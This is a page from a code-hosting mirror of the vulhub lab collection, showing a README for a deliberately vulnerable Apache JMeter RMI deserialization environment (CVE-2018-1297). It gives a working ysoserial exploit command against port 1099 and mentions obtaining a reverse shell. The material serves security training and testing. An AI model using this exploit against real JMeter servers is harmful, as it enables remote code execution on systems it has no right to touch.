aaronxu/vulhub
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

first commit
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Details
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Details
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Details
Vulhub Docker Image CI / images-test (push) Has been cancelled
Details

Browse Source
This commit is contained in:
Aaron
2025-09-06 16:08:15 +08:00
commit 63285f61aa
2624 changed files with 88491 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

33
jmeter/CVE-2018-1297/README.md Normal file
View File

@@ -0,0 +1,33 @@
# Apache JMeter RMI Deserialization Remote Code Execution (CVE-2018-1297)
[中文版本(Chinese version)](README.zh-cn.md)
Apache JMeter is an Apache project that can be used as a load testing tool for analyzing and measuring the performance of a variety of services, with a focus on web applications.
When using Distributed Test only (RMI based), Apache JMeter 2.x and 3.x uses an unsecured RMI connection. This could allow an attacker to get Access to JMeterEngine and send unauthorized code.
## Vulnerable environment
Execute following command to start a JMeter v3.3 RMI server:
```
docker compose up -d
```
After the server is started, the RMI is listening on port 1099.
## Exploit
Use [ysoserial](https://github.com/frohoff/ysoserial) to exploit the deserialization by the gadget `BeanShell1`:
```
java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.RMIRegistryExploit your-ip 1099 BeanShell1 'touch /tmp/success'
```
Execute `docker compose exec jmeter bash` to enter the container, you will see the `/tmp/success` has been created:
![](1.png)
Get a reverse shell:
![](2.png)